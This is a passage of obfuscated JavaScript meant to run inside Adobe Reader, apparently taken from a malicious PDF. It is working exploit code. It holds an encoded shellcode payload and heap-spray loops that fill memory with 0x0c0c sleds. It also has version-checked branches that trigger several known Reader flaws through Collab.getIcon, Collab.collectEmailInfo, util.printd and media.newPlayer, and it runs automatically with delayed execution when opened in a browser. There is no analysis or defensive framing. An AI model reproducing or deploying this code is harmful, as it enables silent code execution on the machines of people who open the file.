	memory=new Array();
	var k = 0;
	while (k < 200)
	{
		memory[k]=sprblk+scblk;
		k++;
	}
}

function repeat(count,what){
	var v = "";
	while (--count >= 0) v += what;
	return v;
}

var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX4864XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"


function exp8() {
	var spd = "XX000aXX000aXX000aXX000a";
	var esc = unescape;
	var spr = esc(urpl(spd));

	var of = repeat(4096, spr);
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
		Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}

function exp9() {	
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	var ret = unescape("%u0c0c%u0c0c");
	var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");

	while(ret.length <= 0x8000) ret+=ret;
	ret=ret.substring(0,0x8000 - s.length);
	memory=new Array();

	for(i=0;i<0x2000;i++) {
		memory[i]= ret + sc;
	}

	util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
	util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
	try {this.media.newPlayer(null);} catch(e) {}
	util.printd(sc2, new Date());

}

function start() 
{
	var esprpl=unescape;
	var sc = esprpl(urpl(s));

	if (app.viewerVersion >= 7.0)
	{
		plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
	} 
	else 
	{
		ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
		plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
		+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
		while ((plin.length % 8) != 0) 
		plin = unescape("%u4141") + plin;

		plin += repeat(2626,ef6);
	}
	if (app.viewerVersion >= 6.0)
	{
	  var a=[];//javascript for adobe
	  Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
	}
}


var ver = app.viewerVersion

if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
	var inBrowser = this.external;
	if (inBrowser)
		var shaft = app.setTimeOut("exp9()",1200);
	else
		exp9();	
}
else
{
	if(ver >= 8.0)
	{
		xxsc(s);

		var inBrowser = this.external;
		if (inBrowser)
			var shaft = app.setTimeOut("exp8()",1200);
		else
			exp8();
	}
	else 
	{
		if(ver >= 6.0)
		{
			var inBrowser = this.external;
			if (inBrowser)
				var shaft = app.setTimeOut("start()",1200);
			else
				start();
		}
		else
		{
			while(1){};
		}
	}
}